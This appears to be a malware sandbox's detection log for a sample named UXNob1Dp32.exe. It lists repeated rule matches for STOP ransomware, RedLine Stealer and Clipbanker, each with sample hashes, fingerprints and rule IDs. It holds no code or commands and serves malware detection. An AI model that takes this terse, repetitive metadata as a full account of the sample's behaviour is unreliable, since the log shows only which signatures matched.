Source: 5.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 24.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 24.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 12.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 23.2.UXNob1Dp32.exe.5de15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 23.2.UXNob1Dp32.exe.5de15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 4.2.UXNob1Dp32.exe.5dc15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 4.2.UXNob1Dp32.exe.5dc15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 23.2.UXNob1Dp32.exe.5de15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 23.2.UXNob1Dp32.exe.5de15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 3.2.UXNob1Dp32.exe.5e515a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 3.2.UXNob1Dp32.exe.5e515a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 3.2.UXNob1Dp32.exe.5e515a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 3.2.UXNob1Dp32.exe.5e515a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 12.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0.2.UXNob1Dp32.exe.5e315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0.2.UXNob1Dp32.exe.5e315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 10.2.UXNob1Dp32.exe.5db15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 10.2.UXNob1Dp32.exe.5db15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0.2.UXNob1Dp32.exe.5e315a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0.2.UXNob1Dp32.exe.5e315a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 4.2.UXNob1Dp32.exe.5dc15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 4.2.UXNob1Dp32.exe.5dc15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000008.00000002.1752670364.0000000001ADE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001F.00000002.3619043820.0000000000930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001F.00000002.3619043820.0000000000930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001D.00000002.3032813684.0000000000A00000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000001.00000002.1648071657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000001.00000002.1648071657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000C.00000002.1815436829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000C.00000002.1815436829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000011.00000002.1981826365.0000000000A1C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000018.00000002.2077605846.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000018.00000002.2077605846.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000014.00000002.4080039509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000014.00000002.4080039509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001A.00000002.2386525416.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001A.00000002.2386525416.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000017.00000002.2065451364.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000A.00000002.1804523922.0000000005DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000E.00000002.1879406390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000E.00000002.1879406390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000017.00000002.2065195987.000000000446D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001E.00000002.3032277609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001E.00000002.3032277609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001B.00000002.2385413925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001B.00000002.2385413925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001D.00000002.3032732772.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001D.00000002.3032732772.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000003.00000002.1653029780.0000000005E50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000001A.00000002.2386315733.0000000000820000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000011.00000002.1981619549.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
